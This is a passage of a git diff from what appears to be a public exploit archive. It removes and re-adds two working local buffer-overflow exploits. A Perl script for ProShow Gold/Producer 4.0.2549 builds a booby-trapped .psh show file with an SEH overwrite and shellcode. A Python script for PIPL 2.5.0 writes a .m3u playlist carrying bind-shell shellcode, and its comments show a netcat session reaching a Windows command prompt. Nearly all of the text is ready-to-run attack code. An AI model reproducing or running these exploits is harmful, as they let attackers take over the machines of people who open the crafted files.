-"cell[0].images[0].aspectX=4\n". -"cell[0].images[0].aspectY=3\n". -"cell[0].images[0].videoVolume=100\n". -"cell[0].images[0].objectId=1\n". -"cell[0].images[0].videoSpeed=100\n". -"cell[0].images[0].nrOfKeyframes=2\n". -"cell[0].images[0].keyframes[0].timeSegment=1\n". 
-"cell[0].images[0].keyframes[0].attributeMask=-1\n". -"cell[0].images[0].keyframes[0].zoomX=10000\n". -"cell[0].images[0].keyframes[0].zoomY=10000\n". -"cell[0].images[0].keyframes[0].panAccelType=1\n". -"cell[0].images[0].keyframes[0].zoomXAccelType=1\n". -"cell[0].images[0].keyframes[0].zoomYAccelType=1\n". -"cell[0].images[0].keyframes[0].rotationAccelType=1\n". -"cell[0].images[0].keyframes[0].motionSmoothness=-1\n". -"cell[0].images[0].keyframes[0].lockAR=1\n". -"cell[0].images[0].keyframes[0].transparency=0\n". -"cell[0].images[0].keyframes[0].colorizeColor=8421504\n". -"cell[0].images[0].keyframes[0].colorizeStrength=10000\n". -"cell[0].images[0].keyframes[0].shadowOffsetX=70\n". -"cell[0].images[0].keyframes[0].shadowOffsetY=70\n". -"cell[0].images[0].keyframes[1].timestamp=10000\n". -"cell[0].images[0].keyframes[1].timeSegment=3\n". -"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n". -"cell[0].images[0].keyframes[1].attributeMask=-1\n". -"cell[0].images[0].keyframes[1].zoomX=10000\n". -"cell[0].images[0].keyframes[1].zoomY=10000\n". -"cell[0].images[0].keyframes[1].panAccelType=1\n". -"cell[0].images[0].keyframes[1].zoomXAccelType=1\n". -"cell[0].images[0].keyframes[1].zoomYAccelType=1\n". -"cell[0].images[0].keyframes[1].rotationAccelType=1\n". -"cell[0].images[0].keyframes[1].motionSmoothness=-1\n". -"cell[0].images[0].keyframes[1].lockAR=1\n". -"cell[0].images[0].keyframes[1].transparency=0\n". -"cell[0].images[0].keyframes[1].colorizeColor=8421504\n". -"cell[0].images[0].keyframes[1].colorizeStrength=10000\n". -"cell[0].images[0].keyframes[1].shadowOffsetX=70\n". -"cell[0].images[0].keyframes[1].shadowOffsetY=70\n". -"cell[0].background=1\n". -"cell[0].bgDefault=1\n". -"cell[0].bgSizeMode=1\n". -"cell[0].bgColorizeColor=8421504\n". -"cell[0].sound.useDefault=1\n". -"cell[0].sound.volume=100\n". -"cell[0].sound.fadeIn=100\n". -"cell[0].sound.fadeOut=100\n". -"cell[0].sound.async=1\n". -"cell[0].sound.musicUseDefault=1\n". 
-"cell[0].sound.musicVolume=50\n". -"cell[0].sound.musicFadeIn=100\n". -"cell[0].sound.musicFadeOut=100\n". -"cell[0].musicVolumeOffset=50\n". -"cell[0].time=3000\n". -"cell[0].transId=2\n". -"cell[0].transTime=3000\n". -"cell[0].includeGlobalCaptions=1\n". -"cell[1].imageEnable=1\n". -"cell[1].nrOfImages=1\n". -"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n". -"cell[1].images[0].imageEnable=1\n". -"cell[1].images[0].name=Abstract_01\n". -"cell[1].images[0].replaceableTemplate=1\n". -"cell[1].images[0].sizeMode=1\n". -"cell[1].images[0].colorizeColor=8421504\n". -"cell[1].images[0].colorizeStrength=10000\n". -"cell[1].images[0].outlineColor=16777215\n". -"cell[1].images[0].aspectX=4\n". -"cell[1].images[0].aspectY=3\n". -"cell[1].images[0].videoVolume=100\n". -"cell[1].images[0].objectId=2\n". -"cell[1].images[0].videoSpeed=100\n". -"cell[1].images[0].nrOfKeyframes=2\n". -"cell[1].images[0].keyframes[0].timeSegment=1\n". -"cell[1].images[0].keyframes[0].attributeMask=-1\n". -"cell[1].images[0].keyframes[0].zoomX=10000\n". -"cell[1].images[0].keyframes[0].zoomY=10000\n". -"cell[1].images[0].keyframes[0].panAccelType=1\n". -"cell[1].images[0].keyframes[0].zoomXAccelType=1\n". -"cell[1].images[0].keyframes[0].zoomYAccelType=1\n". -"cell[1].images[0].keyframes[0].rotationAccelType=1\n". -"cell[1].images[0].keyframes[0].motionSmoothness=-1\n". -"cell[1].images[0].keyframes[0].lockAR=1\n". -"cell[1].images[0].keyframes[0].transparency=0\n". -"cell[1].images[0].keyframes[0].colorizeColor=8421504\n". -"cell[1].images[0].keyframes[0].colorizeStrength=10000\n". -"cell[1].images[0].keyframes[0].shadowOffsetX=70\n". -"cell[1].images[0].keyframes[0].shadowOffsetY=70\n". -"cell[1].images[0].keyframes[1].timestamp=10000\n". -"cell[1].images[0].keyframes[1].timeSegment=3\n". -"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n". -"cell[1].images[0].keyframes[1].attributeMask=-1\n". 
-"cell[1].images[0].keyframes[1].zoomX=10000\n". -"cell[1].images[0].keyframes[1].zoomY=10000\n". -"cell[1].images[0].keyframes[1].panAccelType=1\n". -"cell[1].images[0].keyframes[1].zoomXAccelType=1\n". -"cell[1].images[0].keyframes[1].zoomYAccelType=1\n". -"cell[1].images[0].keyframes[1].rotationAccelType=1\n". -"cell[1].images[0].keyframes[1].motionSmoothness=-1\n". -"cell[1].images[0].keyframes[1].lockAR=1\n". -"cell[1].images[0].keyframes[1].transparency=0\n". -"cell[1].images[0].keyframes[1].colorizeColor=8421504\n". -"cell[1].images[0].keyframes[1].colorizeStrength=10000\n". -"cell[1].images[0].keyframes[1].shadowOffsetX=70\n". -"cell[1].images[0].keyframes[1].shadowOffsetY=70\n". -"cell[1].background=1\n". -"cell[1].bgDefault=1\n". -"cell[1].bgSizeMode=1\n". -"cell[1].bgColorizeColor=8421504\n". -"cell[1].sound.useDefault=1\n". -"cell[1].sound.volume=100\n". -"cell[1].sound.fadeIn=100\n". -"cell[1].sound.fadeOut=100\n". -"cell[1].sound.async=1\n". -"cell[1].sound.musicUseDefault=1\n". -"cell[1].sound.musicVolume=50\n". -"cell[1].sound.musicFadeIn=100\n". -"cell[1].sound.musicFadeOut=100\n". -"cell[1].musicVolumeOffset=50\n". -"cell[1].time=3000\n". -"cell[1].transId=2\n". -"cell[1].transTime=3000\n". -"cell[1].includeGlobalCaptions=1\n". 
-"modifierCount=0\n"; -print $header.$bof.$nsh.$seh.$nop.$sec.$header2; -################################################################################ -################################################################### -open(myfile,'>> HACK4LOVE.psh'); -print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2; -################################################################## - -# milw0rm.com [2009-08-25] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH +########################################################################## +##http://files.photodex.com/release/psgold_40_2549.exe +##http://files.photodex.com/release/pspro_40_2549.exe +########################################################################### +##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################ +########################################################################### +##FIRST WAS BY corelanc0d3r################################################ +########################################################################### +my $header="Photodex(R) ProShow(TM) Show File Version=0\n". +"proshowVersion=2549\n". +"title=Untitled ProShow 1\n". +"fileName=proshowsploit.psh\n". +"description=''\n". +"showAspect=1\n". +"showSizeX=16\n". +"showSizeY=9\n". +"loop=1\n". +"loopRestart=1\n". +"displaySizeX=704\n". +"displaySizeY=528\n". +"videoSizeX=720\n". +"videoSizeY=480\n". +"videoFrameRate=29970\n". +"videoBitRate=1120000\n". +"videoMuxBitRate=1394400\n". +"outputImageSizeX=1024\n". +"outputImageSizeY=768\n". +"outputQuality=80\n". +"toolbarEnable=1\n". +"allowQuit=1\n". +"allowPlay=1\n". +"allowTime=1\n". +"allowRestart=1\n". +"allowSave=1\n". +"allowSaveAll=1\n". +"allowPrint=1\n". +"allowPrintAll=1\n". +"allowCopy=1\n". +"allowSaver=1\n". +"allowCta=1\n". +"ctaLabel=ProShow Info\n". +"ctaURL=http://www.photodex.com/\n". +"background=1\n". +"bgOutlineColor=0\n". +"bgSizeMode=1\n". 
+"bgColorizeColor=8421504\n". +"waterOpacity=128\n". +"waterZoom=10000\n". +"waterColorizeColor=8421504\n". +"musicVolumeOffset=100\n". +"defaultCellVolumeOffset=100\n". +"defaultCellFadeIn=100\n". +"defaultCellFadeOut=100\n". +"defaultMusicVolumeOffset=50\n". +"defaultMusicFadeIn=100\n". +"defaultMusicFadeOut=100\n". +"maxDispWidth=800\n". +"maxDispHeight=600\n". +"maxRender=1\n". +"maxRenderWidth=800\n". +"maxRenderHeight=600\n". +"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n". +"makeFileLocalFolder=c:/\n". +"cells=2\n". +"cell[0].imageEnable=1\n". +"cell[0].nrOfImages=1\n". +"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg"; +#################################################################################### +my $bof="\x41" x 6151; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt +my $nop="\x90" x 20; +my $sec= +"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2". +"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47". +"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b". +"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f". +"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64". +"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26". +"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89". +"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a". +"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06". +"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02"; +############################################################################### +my $header2 = "\ncell[0].images[0].imageEnable=1\n". +"cell[0].images[0].name=Abstract_02\n". +"cell[0].images[0].replaceableTemplate=1\n". +"cell[0].images[0].sizeMode=1\n". +"cell[0].images[0].colorizeColor=8421504\n". 
+"cell[0].images[0].colorizeStrength=10000\n". +"cell[0].images[0].outlineColor=16777215\n". +"cell[0].images[0].aspectX=4\n". +"cell[0].images[0].aspectY=3\n". +"cell[0].images[0].videoVolume=100\n". +"cell[0].images[0].objectId=1\n". +"cell[0].images[0].videoSpeed=100\n". +"cell[0].images[0].nrOfKeyframes=2\n". +"cell[0].images[0].keyframes[0].timeSegment=1\n". +"cell[0].images[0].keyframes[0].attributeMask=-1\n". +"cell[0].images[0].keyframes[0].zoomX=10000\n". +"cell[0].images[0].keyframes[0].zoomY=10000\n". +"cell[0].images[0].keyframes[0].panAccelType=1\n". +"cell[0].images[0].keyframes[0].zoomXAccelType=1\n". +"cell[0].images[0].keyframes[0].zoomYAccelType=1\n". +"cell[0].images[0].keyframes[0].rotationAccelType=1\n". +"cell[0].images[0].keyframes[0].motionSmoothness=-1\n". +"cell[0].images[0].keyframes[0].lockAR=1\n". +"cell[0].images[0].keyframes[0].transparency=0\n". +"cell[0].images[0].keyframes[0].colorizeColor=8421504\n". +"cell[0].images[0].keyframes[0].colorizeStrength=10000\n". +"cell[0].images[0].keyframes[0].shadowOffsetX=70\n". +"cell[0].images[0].keyframes[0].shadowOffsetY=70\n". +"cell[0].images[0].keyframes[1].timestamp=10000\n". +"cell[0].images[0].keyframes[1].timeSegment=3\n". +"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n". +"cell[0].images[0].keyframes[1].attributeMask=-1\n". +"cell[0].images[0].keyframes[1].zoomX=10000\n". +"cell[0].images[0].keyframes[1].zoomY=10000\n". +"cell[0].images[0].keyframes[1].panAccelType=1\n". +"cell[0].images[0].keyframes[1].zoomXAccelType=1\n". +"cell[0].images[0].keyframes[1].zoomYAccelType=1\n". +"cell[0].images[0].keyframes[1].rotationAccelType=1\n". +"cell[0].images[0].keyframes[1].motionSmoothness=-1\n". +"cell[0].images[0].keyframes[1].lockAR=1\n". +"cell[0].images[0].keyframes[1].transparency=0\n". +"cell[0].images[0].keyframes[1].colorizeColor=8421504\n". +"cell[0].images[0].keyframes[1].colorizeStrength=10000\n". +"cell[0].images[0].keyframes[1].shadowOffsetX=70\n". 
+"cell[0].images[0].keyframes[1].shadowOffsetY=70\n". +"cell[0].background=1\n". +"cell[0].bgDefault=1\n". +"cell[0].bgSizeMode=1\n". +"cell[0].bgColorizeColor=8421504\n". +"cell[0].sound.useDefault=1\n". +"cell[0].sound.volume=100\n". +"cell[0].sound.fadeIn=100\n". +"cell[0].sound.fadeOut=100\n". +"cell[0].sound.async=1\n". +"cell[0].sound.musicUseDefault=1\n". +"cell[0].sound.musicVolume=50\n". +"cell[0].sound.musicFadeIn=100\n". +"cell[0].sound.musicFadeOut=100\n". +"cell[0].musicVolumeOffset=50\n". +"cell[0].time=3000\n". +"cell[0].transId=2\n". +"cell[0].transTime=3000\n". +"cell[0].includeGlobalCaptions=1\n". +"cell[1].imageEnable=1\n". +"cell[1].nrOfImages=1\n". +"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n". +"cell[1].images[0].imageEnable=1\n". +"cell[1].images[0].name=Abstract_01\n". +"cell[1].images[0].replaceableTemplate=1\n". +"cell[1].images[0].sizeMode=1\n". +"cell[1].images[0].colorizeColor=8421504\n". +"cell[1].images[0].colorizeStrength=10000\n". +"cell[1].images[0].outlineColor=16777215\n". +"cell[1].images[0].aspectX=4\n". +"cell[1].images[0].aspectY=3\n". +"cell[1].images[0].videoVolume=100\n". +"cell[1].images[0].objectId=2\n". +"cell[1].images[0].videoSpeed=100\n". +"cell[1].images[0].nrOfKeyframes=2\n". +"cell[1].images[0].keyframes[0].timeSegment=1\n". +"cell[1].images[0].keyframes[0].attributeMask=-1\n". +"cell[1].images[0].keyframes[0].zoomX=10000\n". +"cell[1].images[0].keyframes[0].zoomY=10000\n". +"cell[1].images[0].keyframes[0].panAccelType=1\n". +"cell[1].images[0].keyframes[0].zoomXAccelType=1\n". +"cell[1].images[0].keyframes[0].zoomYAccelType=1\n". +"cell[1].images[0].keyframes[0].rotationAccelType=1\n". +"cell[1].images[0].keyframes[0].motionSmoothness=-1\n". +"cell[1].images[0].keyframes[0].lockAR=1\n". +"cell[1].images[0].keyframes[0].transparency=0\n". +"cell[1].images[0].keyframes[0].colorizeColor=8421504\n". 
+"cell[1].images[0].keyframes[0].colorizeStrength=10000\n". +"cell[1].images[0].keyframes[0].shadowOffsetX=70\n". +"cell[1].images[0].keyframes[0].shadowOffsetY=70\n". +"cell[1].images[0].keyframes[1].timestamp=10000\n". +"cell[1].images[0].keyframes[1].timeSegment=3\n". +"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n". +"cell[1].images[0].keyframes[1].attributeMask=-1\n". +"cell[1].images[0].keyframes[1].zoomX=10000\n". +"cell[1].images[0].keyframes[1].zoomY=10000\n". +"cell[1].images[0].keyframes[1].panAccelType=1\n". +"cell[1].images[0].keyframes[1].zoomXAccelType=1\n". +"cell[1].images[0].keyframes[1].zoomYAccelType=1\n". +"cell[1].images[0].keyframes[1].rotationAccelType=1\n". +"cell[1].images[0].keyframes[1].motionSmoothness=-1\n". +"cell[1].images[0].keyframes[1].lockAR=1\n". +"cell[1].images[0].keyframes[1].transparency=0\n". +"cell[1].images[0].keyframes[1].colorizeColor=8421504\n". +"cell[1].images[0].keyframes[1].colorizeStrength=10000\n". +"cell[1].images[0].keyframes[1].shadowOffsetX=70\n". +"cell[1].images[0].keyframes[1].shadowOffsetY=70\n". +"cell[1].background=1\n". +"cell[1].bgDefault=1\n". +"cell[1].bgSizeMode=1\n". +"cell[1].bgColorizeColor=8421504\n". +"cell[1].sound.useDefault=1\n". +"cell[1].sound.volume=100\n". +"cell[1].sound.fadeIn=100\n". +"cell[1].sound.fadeOut=100\n". +"cell[1].sound.async=1\n". +"cell[1].sound.musicUseDefault=1\n". +"cell[1].sound.musicVolume=50\n". +"cell[1].sound.musicFadeIn=100\n". +"cell[1].sound.musicFadeOut=100\n". +"cell[1].musicVolumeOffset=50\n". +"cell[1].time=3000\n". +"cell[1].transId=2\n". +"cell[1].transTime=3000\n". +"cell[1].includeGlobalCaptions=1\n". 
+"modifierCount=0\n"; +print $header.$bof.$nsh.$seh.$nop.$sec.$header2; +################################################################################ +################################################################### +open(myfile,'>> HACK4LOVE.psh'); +print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2; +################################################################## + +# milw0rm.com [2009-08-25] diff --git a/platforms/windows/local/9536.py b/platforms/windows/local/9536.py index 5cb6ed58d..7bb6a72ce 100755 --- a/platforms/windows/local/9536.py +++ b/platforms/windows/local/9536.py 
@@ -1,88 +1,88 @@ -#!/usr/bin/python -# -############################################################# -# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH) -# Coded by: Steven Seeley aka mr_me -# email: info [At] net-ninja [d0t] net -# Download: http://www.programmedintegration.com/files/pipl.exe -# Tested on Wind0ws XP sp3 & Vist@ -# SEH overwrite, just for kicks -# Surprise surpise m3u file ;) but no calc this time muhahaha -# ########################################################### -# -# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke :) -# -# samurai@mrme:~/exploits$ nc -v 192.168.0.6 4444 -# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out -# (UNKNOWN) [192.168.0.6] 4444 (?) open -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Documents and Settings\Owner\Desktop> -# - -print "[+] Pipl 2.5.0 local exploit" - -bof="\x41" * 4108 -nsh="\xEB\x06\x90\x90" -seh="\x17\x07\x01\x10" #xaudio.dll ppr -nops="\x90" * 20 - -# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum -# http://metasploit.com */ - -sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" -"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" -"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" -"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" -"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" -"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" 
-"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" -"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" -"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" -"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" -"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" -"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" -"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" -"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" -"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" -"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" -"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" -"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" -"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" -"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" -"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" -"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" -"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" -"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" -"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" -"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" -"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" -"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" -"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" -"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" -"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" -"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" -"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" -"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" -"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" 
-"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" -"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" -"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" -"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") - -buff = bof + nsh + seh + nops + sc - -f1 = open('mr_mes_miX.m3u','w'); -f1.write(buff); -f1.close(); - -print "[+] mr_mes_miX.m3u file created successfully" - -# milw0rm.com [2009-08-28] +#!/usr/bin/python +# +############################################################# +# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH) +# Coded by: Steven Seeley aka mr_me +# email: info [At] net-ninja [d0t] net +# Download: http://www.programmedintegration.com/files/pipl.exe +# Tested on Wind0ws XP sp3 & Vist@ +# SEH overwrite, just for kicks +# Surprise surpise m3u file ;) but no calc this time muhahaha +# ########################################################### +# +# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke :) +# +# samurai@mrme:~/exploits$ nc -v 192.168.0.6 4444 +# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out +# (UNKNOWN) [192.168.0.6] 4444 (?) open +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. 
+# +# C:\Documents and Settings\Owner\Desktop> +# + +print "[+] Pipl 2.5.0 local exploit" + +bof="\x41" * 4108 +nsh="\xEB\x06\x90\x90" +seh="\x17\x07\x01\x10" #xaudio.dll ppr +nops="\x90" * 20 + +# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum +# http://metasploit.com */ + +sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" +"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" +"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" +"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" +"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" +"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" +"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" +"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" +"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" +"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" +"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" +"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" +"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" +"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" +"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" +"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" +"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" +"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" 
+"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" +"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" +"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" +"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" +"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" +"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" +"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" +"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" +"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" +"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" +"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" +"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" +"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" +"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" +"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" +"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" +"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" +"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" +"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" +"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" +"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") + +buff = bof + nsh + seh + nops + sc + +f1 = open('mr_mes_miX.m3u','w'); +f1.write(buff); +f1.close(); + +print "[+] mr_mes_miX.m3u file 